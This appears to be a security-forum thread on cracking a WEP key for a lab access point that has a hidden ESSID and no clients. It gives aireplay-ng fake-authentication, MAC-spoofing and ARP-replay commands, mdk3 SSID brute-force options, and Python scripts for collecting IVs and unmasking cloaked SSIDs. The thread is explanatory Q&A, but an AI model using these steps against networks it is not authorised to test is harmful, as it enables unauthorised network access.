In my test lab I have an AP with no clients connected to it, and I want to crack the WEP key by rebroadcasting the packets that I receive from the AP. I'll finally convert the broadcast packet so that the AP generates a new IV.
Before this attack works, I first need to perform a fake authentication. This succeeds when I know the ESSID.
So, the question is: how can I successfully authenticate without knowing the ESSID when no wireless clients are connected?
cheers
Damien
Check the latest video in BT4 video section...
First, make sure you start airodump-ng, then run
aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0
Insert the AP MAC address, and your injection-enabled ethernet card in place of mon0.
Then start aireplay-ng in ARP replay mode and watch for magic!
In a world where data is the coin of the realm, and transmissions are guarded by no better sentinels
than man-made codes and corruptible devices, there is no such thing as a secret
No luck: when I launch the fake auth attack, I always get the message "Please specify an ESSID", even when I specify -h and the MAC of my machine. So the association was not successful.
When I then launch aireplay-ng in ARP replay mode, I get disassociation messages.
Any suggestions ?
Sorry for confusing you with my other post: you should use "-a" and not "-b" (this has been corrected in the older post). Try that, and aireplay-ng should not ask for the ESSID.
Now for the long version of the reply
-------------------------------------------------
Your case
1- You have an AP that is broadcasting its BSSID
2- You have no MAC addresses of connected clients (not even from other, older sessions, not necessarily at the moment of the attack)
The Attack:
A- Start collecting IVs
airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0
Make sure you insert the AP BSSID in place of xx:xx:xx:xx:xx:xx, the channel number in place of XX, and the name of your injection-enabled NIC in place of mon0.
B- Run aireplay-ng in fake auth mode
aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0
Insert the AP MAC address and the name of your NIC.
If the access point does not have MAC filtering, then you will be able to use the fake authentication attack without the -h argument; otherwise, this attack will not work unless you use
aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy mon0
where yy:yy:yy:yy:yy:yy is the MAC address of an already connected client (NOT YOUR NIC MAC).
C- Finally, run aireplay-ng in ARP replay mode
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0
Again, replace xx:xx:xx:xx:xx:xx with the AP MAC and mon0 with your NIC name.
Good luck
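As an added illustration of step A and step C above (example code written for this thread, not code from aircrack-ng or from any poster), the script below pulls the WEP IV out of raw 802.11 data frames, counts distinct IVs the way airodump-ng's unique-IV counter does, flags IV reuse, and picks out ARP-request candidates for reinjection. ARP requests are recognised without decrypting anything: from a non-QoS station they are a fixed 68-byte frame (24-byte header, 4-byte IV/key index, 8-byte LLC/SNAP plus 28-byte ARP, 4-byte ICV) addressed to ff:ff:ff:ff:ff:ff, which is why the ARP replay attack can pick them out of an encrypted capture. The BSSID, station MAC, IVs and frame payloads are constructed for the example; the "ciphertext" is filler bytes.

```python
"""WEP IV collection and ARP-replay candidate selection on raw 802.11 frames.

Added example for this thread; not code from aircrack-ng or from any poster.
The frames below are constructed by hand (the 'ciphertext' is filler), so the
script runs offline with no capture file.
"""

BROADCAST = b"\xff" * 6
# Encrypted ARP request from a non-QoS station: 24-byte MAC header + 3-byte IV
# + 1-byte key index + 36 bytes (8 LLC/SNAP + 28 ARP) + 4-byte ICV = 68 bytes.
ARP_WEP_FRAME_LEN = 24 + 4 + 36 + 4


def mac_str(mac):
    return ":".join(f"{b:02x}" for b in mac)


def wep_header_len(frame):
    """Length of the MAC header in front of the WEP IV, or None if not WEP data."""
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2 or not fc1 & 0x40:   # type Data, Protected bit set
        return None
    hdr = 30 if fc1 & 0x03 == 0x03 else 24        # four addresses when ToDS+FromDS
    if fc0 & 0x80:                                 # QoS Data subtypes add a 2-byte QoS field
        hdr += 2
    return hdr


def wep_iv(frame):
    """Return (iv, key_index) from a WEP-protected data frame, else None."""
    hdr = wep_header_len(frame)
    if hdr is None or len(frame) < hdr + 4:
        return None
    return frame[hdr:hdr + 3], frame[hdr + 3] >> 6


def is_arp_replay_candidate(frame):
    """ARP requests are recognised without decrypting: fixed size, broadcast DA."""
    hdr = wep_header_len(frame)
    if hdr != 24:                                  # only plain station<->AP frames
        return False
    to_ds = frame[1] & 0x01
    dst = frame[16:22] if to_ds else frame[4:10]   # DA is addr3 (ToDS) or addr1 (FromDS)
    return len(frame) == ARP_WEP_FRAME_LEN and dst == BROADCAST


def collect_ivs(frames):
    """Summarise a capture: unique IVs, IVs seen twice (keystream reuse), replay candidates."""
    seen, reused, candidates = {}, [], 0
    for f in frames:
        r = wep_iv(f)
        if r is None:
            continue
        iv, _ = r
        if iv in seen:
            reused.append(iv.hex())
        seen[iv] = seen.get(iv, 0) + 1
        if is_arp_replay_candidate(f):
            candidates += 1
    return {"unique_ivs": len(seen), "reused_ivs": reused, "arp_candidates": candidates}


def build_wep_data(to_ds, bssid, sta, dst, iv, key_idx=0, payload_len=36):
    """Constructed WEP data frame; payload bytes are filler, not real ciphertext."""
    fc = bytes([0x08, 0x40 | (0x01 if to_ds else 0x02)])   # Data, Protected, ToDS/FromDS
    a1, a2, a3 = (bssid, sta, dst) if to_ds else (dst, bssid, sta)
    hdr = fc + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00"
    filler = bytes((i * 7 + 3) & 0xFF for i in range(payload_len))
    return hdr + iv + bytes([key_idx << 6]) + filler + b"\x00\x00\x00\x00"   # trailing ICV placeholder


# Constructed sample capture (addresses are made up for the example).
AP = bytes.fromhex("00112233aabb")
STA = bytes.fromhex("001122ccddee")
SAMPLE_FRAMES = [
    build_wep_data(True, AP, STA, BROADCAST, b"\x01\x02\x03"),          # ARP request, station -> AP
    build_wep_data(False, AP, STA, BROADCAST, b"\x01\x02\x04"),         # AP relays it under a new IV
    build_wep_data(True, AP, STA, AP, b"\x01\x02\x05", payload_len=60),  # unicast, not ARP-sized
    build_wep_data(True, AP, STA, BROADCAST, b"\x01\x02\x03"),          # same IV again: keystream reuse
]

if __name__ == "__main__":
    print(collect_ivs(SAMPLE_FRAMES))
```

Run it as is and it reports three distinct IVs, one reused IV and three ARP-sized broadcast frames; feed `collect_ivs` the data frames from a real monitor-mode capture and the `unique_ivs` figure is the number aircrack-ng needs to grow, while `arp_candidates` is what `aireplay-ng -3` waits for before it can start reinjecting.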
Your situation works if the AP is broadcasting its ESSID, but the case is:
1) The AP does not broadcast its ESSID
2) There are no wireless clients connected to the AP
So, in your step B, I cannot use -h YY:YY, since there are no wireless clients.
ESSID
The Extended Service Set ID (ESSID) is the name of the network you want to access. It is used to identify different wireless networks.
BSSID
The BSSID is a 48-bit identity used to identify a particular BSS (Basic Service Set) within an area.
It is clear you need to do some more reading... these are basics you should be informed about... do your homework and ask me no more questions before you do so.
^
Dude, you are misreading the OP's question completely..
reading abilities.. hmm..
He is talking about a network that is not broadcasting the ESSID..
So a hidden ssid..
There are a couple of options to try and find out what the ESSID is:
1. You do a dictionary attack on the network using mdk3.
2. You do a bruteforce attack on the network using mdk3
(not recommended for any ssid over 4 characters..)
3. You monitor the network and wait for someone to probe it / associate with it.
So, to Damien:
When you are running airodump-ng and checking your network, is it mentioning a length 0 SSID, or length 5, or some other value?
If you can actually see how many characters it is, you can decide whether to use a bruteforce option. If it is length 0 then you will not know, so you would need to try the dictionary approach.
Again.. I posted a vid on that specific situation:
http://forums.remote-exploit.org/bt4...track-4-a.html
Check it out, and obviously, as you know the ESSID of your network, you can alter wordlists etc. to suit the best method of the above.
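To make the "length 0 vs. length 5" point above concrete, here is an added example (written for this thread, not code from airodump-ng, mdk3 or any poster) that parses the SSID information element out of beacon and probe-response frames. A cloaked AP either sends a zero-length SSID element or keeps the real length and fills it with NUL bytes; airodump-ng shows both as `<length: N>`. The script classifies each frame, keeps per-BSSID state so that the real name is filled in once the AP answers a probe (option 3 above), and maps the observed length to the approach the post suggests, with the printable-ASCII search space showing why brute force stops being practical past four characters. The BSSID, client MAC and frames are constructed for the example.

```python
"""Telling a cloaked SSID from a broadcast one in beacon / probe-response frames.

Added example for this thread; not code from aircrack-ng, mdk3 or any poster.
Frames are constructed by hand below so the script runs offline.
"""
import struct

IE_SSID = 0
IE_DS_PARAMS = 3
SUBTYPE_PROBE_RESP, SUBTYPE_BEACON = 5, 8
FIXED_FIELDS_LEN = 12   # timestamp(8) + beacon interval(2) + capability(2)
BROADCAST = b"\xff" * 6


def mac_str(mac):
    return ":".join(f"{b:02x}" for b in mac)


def mgmt_subtype(frame):
    """Return the management subtype, or None if this is not a management frame."""
    fc0 = frame[0]
    return (fc0 >> 4) & 0xF if (fc0 >> 2) & 0x3 == 0 else None


def parse_ies(body):
    """Yield (element_id, data) tagged parameters; stop at the first truncated one."""
    off = 0
    while off + 2 <= len(body):
        eid, elen = body[off], body[off + 1]
        data = body[off + 2:off + 2 + elen]
        if len(data) < elen:
            break                       # don't trust a cut-off element
        yield eid, data
        off += 2 + elen


def classify_ssid(frame):
    """('hidden', length) or ('broadcast', name) for a beacon or probe response.

    A cloaked AP sends a zero-length SSID element, or keeps the real length and
    fills it with NULs; airodump-ng shows both as <length: N>.
    """
    if mgmt_subtype(frame) not in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        raise ValueError("not a beacon or probe response")
    for eid, data in parse_ies(frame[24 + FIXED_FIELDS_LEN:]):
        if eid == IE_SSID:
            if not data or not data.strip(b"\x00"):
                return "hidden", len(data)
            return "broadcast", data.decode("utf-8", "replace")
    return "hidden", 0                  # no SSID element at all


def track_networks(frames):
    """Per BSSID: cloaked length from beacons, real name once the AP answers a probe."""
    nets = {}
    for f in frames:
        if mgmt_subtype(f) not in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
            continue
        bssid = mac_str(f[16:22])       # addr3 carries the BSSID in beacons / probe responses
        entry = nets.setdefault(bssid, {"ssid": None, "hidden_len": None})
        kind, value = classify_ssid(f)
        entry["ssid" if kind == "broadcast" else "hidden_len"] = value
    return nets


def bruteforce_space(length, charset_size=95):
    """Number of candidate names of a known length over printable ASCII."""
    return charset_size ** length


def strategy(hidden_len):
    """Map the observed <length: N> to the approach suggested in the post above."""
    if hidden_len == 0:
        return "dictionary"             # length unknown: wordlist, or wait for a probe
    if hidden_len <= 4:
        return "bruteforce"             # at most 95**4 candidates, which is practical
    return "dictionary-or-wait"         # brute force is impractical above 4 characters


def build_mgmt(subtype, dst, src, bssid, ies):
    """Constructed beacon / probe response: 24-byte header, fixed fields, tagged IEs."""
    hdr = bytes([subtype << 4, 0x00]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0011)   # timestamp, interval, capability ESS|Privacy
    tagged = b"".join(bytes([eid, len(d)]) + d for eid, d in ies)
    return hdr + fixed + tagged


# Constructed sample capture (addresses and SSID are made up for the example).
AP = bytes.fromhex("00aabbccddee")
STA = bytes.fromhex("001122334455")
SAMPLE_FRAMES = [
    build_mgmt(SUBTYPE_BEACON, BROADCAST, AP, AP, [(IE_SSID, b"\x00" * 5), (IE_DS_PARAMS, b"\x06")]),
    build_mgmt(SUBTYPE_PROBE_RESP, STA, AP, AP, [(IE_SSID, b"lab01"), (IE_DS_PARAMS, b"\x06")]),
]

if __name__ == "__main__":
    for bssid, info in track_networks(SAMPLE_FRAMES).items():
        print(bssid, info, strategy(info["hidden_len"]))
```

On the constructed capture the beacon alone only yields `hidden_len: 5`, and the name `lab01` appears only after the probe response, which is exactly the situation where you either wait for a client to probe or hand the known length to a brute-force or wordlist run.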
I've been attempting to do this very thing yet when attempting this [code: airodump-ng --ivs -w filename --bssid xx:xx:xx:xx:xx:xx --channel XX mon0] I get "Invalid output format :IV's and PCAP format cannot be used together". What am I doing wrong? Thanks in advance for handing down the knowledge.